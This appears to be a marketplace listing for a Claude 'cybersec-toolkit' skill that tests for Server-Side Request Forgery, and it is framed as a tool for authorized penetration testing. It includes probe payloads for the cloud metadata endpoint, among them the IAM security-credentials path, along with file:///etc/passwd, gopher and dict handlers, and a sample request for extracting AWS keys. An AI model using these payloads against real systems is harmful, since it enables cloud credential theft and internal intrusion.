Stats
Actions
Tags
From cybersec-toolkit
Tests for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints, internal services, and protocol handlers. Useful for security assessments and penetration testing.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:performing-ssrf-vulnerability-exploitationThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
- When conducting security assessments that involve performing ssrf vulnerability exploitation
pip install requestshttp://169.254.169.254/latest/meta-data/http://127.0.0.1:port/, http://10.0.0.1/file:///etc/passwd, gopher://, dict://# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitTests for Server-Side Request Forgery vulnerabilities by probing cloud metadata endpoints, internal services, and protocol handlers. Useful for security assessments and penetration testing.
Tests SSRF vulnerabilities by probing AWS/GCP/Azure metadata endpoints (169.254.169.254), internal services, ports, protocol handlers, and bypasses like DNS rebinding via user URLs.
Identifies and exploits SSRF vulnerabilities to access internal services, cloud metadata, and restricted resources during authorized penetration tests.